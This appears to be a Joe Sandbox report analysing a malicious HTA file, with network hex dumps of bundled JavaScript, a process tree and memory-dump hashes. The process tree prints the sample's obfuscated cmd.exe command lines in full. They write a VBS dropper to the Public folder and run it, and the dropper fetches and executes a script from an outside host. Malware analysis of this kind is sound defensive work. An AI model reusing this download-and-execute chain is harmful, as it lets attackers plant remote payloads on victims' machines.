                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 20 0a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 20 0a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 4d 61 74 68 2e 75 75 69 64 2e 6a 73 20 28 76 31 2e 34 29 20 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 6d 61 69 6c 74 6f 3a 72 6f 62 65 72 74 40 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32
                                                                                                                                                                                                                              Data Ascii: S OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ /* Math.uuid.js (v1.4) http://www.broofa.com mailto:robert@broofa.com Copyright (c) 2
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 6f 2c 6d 6f 2c 77 6f 2c 6e 6f 2c 79 6f 2c 7a 6f 2c 44 6f 2c 45 6f 2c 48 6f 2c 49 6f 2c 4a 6f 2c 4c 6f 2c 52 6f 2c 54 6f 2c 58 6f 2c 59 6f 2c 63 70 2c 65 70 2c 66 70 2c 68 70 2c 69 70 2c 6e 70 2c 6f 70 2c 70 70 2c 74 70 2c 6d 70 2c 76 70 2c 77 70 2c 78 70 2c 7a 70 2c 43 70 2c 45 70 2c 46 70 2c 47 70 2c 48 70 2c 4a 70 2c 4c 70 2c 4d 70 2c 4f 70 2c 50 70 2c 51 70 2c 52 70 2c 53 70 2c 54 70 2c 58 70 2c 59 70 2c 62 71 2c 64 71 2c 63 71 2c 68 71 2c 69 71 2c 6a 71 2c 6e 71 2c 6f 71 2c 71 71 2c 70 71 2c 73 71 2c 75 71 2c 77 71 2c 46 71 2c 48 71 2c 4d 71 2c 50 71 2c 51 71 2c 5a 71 2c 62 72 2c 24 71 2c 61 72 2c 69 72 2c 6a 72 2c 73 72 2c 77 72 2c 79 72 2c 41 72 2c 44 72 2c 43 72 2c 42 72 2c 50 72 2c 53 72 2c 5a 72 2c 24 72 2c 69 73 2c 6a 73 2c 6c 73 2c 6d 73 2c 6f
                                                                                                                                                                                                                              Data Ascii: o,mo,wo,no,yo,zo,Do,Eo,Ho,Io,Jo,Lo,Ro,To,Xo,Yo,cp,ep,fp,hp,ip,np,op,pp,tp,mp,vp,wp,xp,zp,Cp,Ep,Fp,Gp,Hp,Jp,Lp,Mp,Op,Pp,Qp,Rp,Sp,Tp,Xp,Yp,bq,dq,cq,hq,iq,jq,nq,oq,qq,pq,sq,uq,wq,Fq,Hq,Mq,Pq,Qq,Zq,br,$q,ar,ir,jr,sr,wr,yr,Ar,Dr,Cr,Br,Pr,Sr,Zr,$r,is,js,ls,ms,o
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 74 61 28 29 7c 7c 28 5f 2e 6e 61 28 29 3f 30 3a 5f 2e 6d 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 70 61 28 29 7c 7c 28 5f 2e 6e 61 28 29 3f 30 3a 5f 2e 6d 61 28 22 45 64 67 65 22 29 29 7c 7c 28 5f 2e 6e 61 28 29 3f 6a 61 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 5f 2e 6d 61 28 22 45 64 67 2f 22 29 29 7c 7c 28 5f 2e 6e 61 28 29 3f 6a 61 28 22 4f 70 65 72 61 22 29 3a 5f 2e 6d 61 28 22 4f 50 52 22 29 29 7c 7c 5f 2e 73 61 28 29 7c 7c 5f 2e 6d 61 28 22 53 69 6c 6b 22 29 7c 7c 5f 2e 6d 61 28 22 41 6e 64 72 6f 69 64 22 29 29 7d 3b 5f 2e 74 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 6e 61 28 29 3f 6a 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 6d 61 28 22 43 68 72 6f
                                                                                                                                                                                                                              Data Ascii: ("Safari")&&!(_.ta()||(_.na()?0:_.ma("Coast"))||_.pa()||(_.na()?0:_.ma("Edge"))||(_.na()?ja("Microsoft Edge"):_.ma("Edg/"))||(_.na()?ja("Opera"):_.ma("OPR"))||_.sa()||_.ma("Silk")||_.ma("Android"))};_.ta=function(){return _.na()?ja("Chromium"):(_.ma("Chro
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 62 2c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 22 29 3b 28 62 3d 63 3d 3d 6e 75 6c 6c 3f 22 22 3a 63 2e 6e 6f 6e 63 65 7c 7c 63 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7c 7c 22 22 29 26 26 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 62 29 7d 3b 52 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 41 61 28 62 29 3b 51 61 28 61 29 7d 3b 5f 2e 55 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 53 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 56 61 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                                                                                                                                                                                              Data Ascii: c).querySelector)==null?void 0:d.call(b,"script[nonce]");(b=c==null?"":c.nonce||c.getAttribute("nonce")||"")&&a.setAttribute("nonce",b)};Ra=function(a,b){a.src=_.Aa(b);Qa(a)};_.Ua=function(a){if(a instanceof _.Sa)return a.g;throw Error("");};Va=function(a
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 6b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 7b 7d 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 65 2c 64 2c 61 29 3b 66 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 5b 66 5d 7c 7c 28 63 5b 66 5d 3d 5b 5d 29 29 2e 70 75 73 68 28 65 29 7d 72 65 74 75 72 6e 20 63 7d 3b 6c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 5b 5d 2c 63 3d 30 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29
                                                                                                                                                                                                                              Data Ascii: =function(a,b){return a===b};kb=function(a,b){for(var c={},d=0;d<a.length;d++){var e=a[d],f=b.call(void 0,e,d,a);f!==void 0&&(c[f]||(c[f]=[])).push(e)}return c};lb=function(a){for(var b=[],c=0;c<arguments.length;c++){var d=arguments[c];if(Array.isArray(d)
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 3e 31 32 26 36 33 7c 31 32 38 3b 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 3b 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 3b 63 6f 6e 74 69 6e 75 65 7d 65 6c 73 65 20 65 2d 2d 7d 69 66 28 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 46 6f 75 6e 64 20 61 6e 20 75 6e 70 61 69 72 65 64 20 73 75 72 72 6f 67 61 74 65 22 29 3b 66 3d 36 35 35 33 33 7d 64 5b 63 2b 2b 5d 3d 66 3e 3e 31 32 7c 32 32 34 3b 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 7d 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 7d 7d 61 3d 63 3d 3d 3d 64 2e 6c 65 6e 67 74 68 3f 64 3a 64 2e 73 75 62 61 72 72 61 79 28 30 2c 63 29 7d 72 65 74 75 72 6e 20 61 7d 3b 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 64 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                              Data Ascii: >12&63|128;d[c++]=f>>6&63|128;d[c++]=f&63|128;continue}else e--}if(b)throw Error("Found an unpaired surrogate");f=65533}d[c++]=f>>12|224;d[c++]=f>>6&63|128}d[c++]=f&63|128}}a=c===d.length?d:d.subarray(0,c)}return a};sb=function(a){_.da.setTimeout(function
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 72 6e 20 61 21 3d 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 4f 62 6a 65 63 74 7d 3b 59 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 21 3d 6e 75 6c 6c 29 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 61 3d 61 3f 6e 65 77 20 57 62 28 61 2c 42 62 29 3a 58 62 28 29 3b 65 6c 73 65 20 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 57 62 29 69 66 28 41 62 28 61 29 29 61 3d 61 2e 6c 65 6e 67 74 68 3f 6e 65 77 20 57 62 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 61 29 2c 42 62 29 3a 58 62 28 29 3b 65 6c 73 65 7b 69 66 28 21 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29
                                                                                                                                                                                                                              Data Ascii: rn a!==null&&typeof a==="object"&&!Array.isArray(a)&&a.constructor===Object};Yb=function(a,b){if(a!=null)if(typeof a==="string")a=a?new Wb(a,Bb):Xb();else if(a.constructor!==Wb)if(Ab(a))a=a.length?new Wb(new Uint8Array(a),Bb):Xb();else{if(!b)throw Error()
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 2a 28 3f 3a 2d 3f 5b 31 2d 39 5d 5c 64 2a 7c 30 29 3f 5c 73 2a 24 2f 2e 74 65 73 74 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 7d 65 6c 73 65 20 69 66 28 73 63 28 62 29 26 26 21 5f 2e 77 28 4e 75 6d 62 65 72 2c 22 69 73 53 61 66 65 49 6e 74 65 67 65 72 22 29 2e 63 61 6c 6c 28 4e 75 6d 62 65 72 2c 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 72 65 74 75 72 6e 20 74 63 3f 42 69 67 49 6e 74 28 61 29 3a 61 3d 75 63 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 71 63 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 7d 3b 77 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 69
                                                                                                                                                                                                                              Data Ascii: *(?:-?[1-9]\d*|0)?\s*$/.test(b))throw Error(String(b));}else if(sc(b)&&!_.w(Number,"isSafeInteger").call(Number,b))throw Error(String(b));return tc?BigInt(a):a=uc(a)?a?"1":"0":qc(a)?a.trim()||"0":String(a)};wc=function(a,b){if(a.length>b.length)return!1;i
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC1390INData Raw: 2e 78 63 3d 30 3b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 62 2c 65 3d 28 63 2d 62 29 25 36 2b 62 3b 65 3c 3d 63 3b 64 3d 65 2c 65 2b 3d 36 29 64 3d 4e 75 6d 62 65 72 28 61 2e 73 6c 69 63 65 28 64 2c 65 29 29 2c 5f 2e 79 63 2a 3d 31 45 36 2c 5f 2e 78 63 3d 5f 2e 78 63 2a 31 45 36 2b 64 2c 5f 2e 78 63 3e 3d 34 32 39 34 39 36 37 32 39 36 26 26 28 5f 2e 79 63 2b 3d 5f 2e 77 28 4d 61 74 68 2c 22 74 72 75 6e 63 22 29 2e 63 61 6c 6c 28 4d 61 74 68 2c 5f 2e 78 63 2f 34 32 39 34 39 36 37 32 39 36 29 2c 5f 2e 79 63 3e 3e 3e 3d 30 2c 5f 2e 78 63 3e 3e 3e 3d 30 29 3b 62 26 26 28 62 3d 5f 2e 79 28 41 63 28 5f 2e 78 63 2c 5f 2e 79 63 29 29 2c 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2c 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2c 5f
                                                                                                                                                                                                                              Data Ascii: .xc=0;for(var c=a.length,d=b,e=(c-b)%6+b;e<=c;d=e,e+=6)d=Number(a.slice(d,e)),_.yc*=1E6,_.xc=_.xc*1E6+d,_.xc>=4294967296&&(_.yc+=_.w(Math,"trunc").call(Math,_.xc/4294967296),_.yc>>>=0,_.xc>>>=0);b&&(b=_.y(Ac(_.xc,_.yc)),a=b.next().value,b=b.next().value,_


                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:04:33:11
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
                                                                                                                                                                                                                              Imagebase:0x450000
                                                                                                                                                                                                                              File size:13'312 bytes
                                                                                                                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:04:33:57
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                              Imagebase:0xb0000
                                                                                                                                                                                                                              File size:147'456 bytes
                                                                                                                                                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 20
                                                                                                                                                                                                                                • API String ID: 0-2322626082
                                                                                                                                                                                                                                • Opcode ID: c17bd9d21c08de9870f3025892469f49abd811cdf854a89fef522f3584fc79bf
                                                                                                                                                                                                                                • Instruction ID: 4f18c92b16ccf582b84a2128f7cf6d72b77b976d3241ad99233fbcefcd8cdff8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c17bd9d21c08de9870f3025892469f49abd811cdf854a89fef522f3584fc79bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28328B31A103219BDB249F78CC52BB9B7A5AF51714F76011AED0ABB2A4D774CCC1C7A1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E132000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 20
                                                                                                                                                                                                                                • API String ID: 0-2322626082
                                                                                                                                                                                                                                • Opcode ID: c17bd9d21c08de9870f3025892469f49abd811cdf854a89fef522f3584fc79bf
                                                                                                                                                                                                                                • Instruction ID: 4f18c92b16ccf582b84a2128f7cf6d72b77b976d3241ad99233fbcefcd8cdff8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c17bd9d21c08de9870f3025892469f49abd811cdf854a89fef522f3584fc79bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28328B31A103219BDB249F78CC52BB9B7A5AF51714F76011AED0ABB2A4D774CCC1C7A1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: c"
                                                                                                                                                                                                                                • API String ID: 0-3664341887
                                                                                                                                                                                                                                • Opcode ID: 0df99a0b091ada09146e045ccf67ded95f028e223c3c336ca4aa6e1ce3849f8e
                                                                                                                                                                                                                                • Instruction ID: 25d5b57ab17658f990d2a87b369dc655ee0712ac85f29c287b34ecf8798bcb7e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0df99a0b091ada09146e045ccf67ded95f028e223c3c336ca4aa6e1ce3849f8e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3319270A05704DFDB20CF69D584BA9B7F1FF85324F204259D4699B344C7B59C45CBA1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: c"
                                                                                                                                                                                                                                • API String ID: 0-3664341887
                                                                                                                                                                                                                                • Opcode ID: 0df99a0b091ada09146e045ccf67ded95f028e223c3c336ca4aa6e1ce3849f8e
                                                                                                                                                                                                                                • Instruction ID: 25d5b57ab17658f990d2a87b369dc655ee0712ac85f29c287b34ecf8798bcb7e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0df99a0b091ada09146e045ccf67ded95f028e223c3c336ca4aa6e1ce3849f8e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3319270A05704DFDB20CF69D584BA9B7F1FF85324F204259D4699B344C7B59C45CBA1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E139000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: c"
                                                                                                                                                                                                                                • API String ID: 0-3664341887
                                                                                                                                                                                                                                • Opcode ID: 0df99a0b091ada09146e045ccf67ded95f028e223c3c336ca4aa6e1ce3849f8e
                                                                                                                                                                                                                                • Instruction ID: 25d5b57ab17658f990d2a87b369dc655ee0712ac85f29c287b34ecf8798bcb7e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0df99a0b091ada09146e045ccf67ded95f028e223c3c336ca4aa6e1ce3849f8e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3319270A05704DFDB20CF69D584BA9B7F1FF85324F204259D4699B344C7B59C45CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
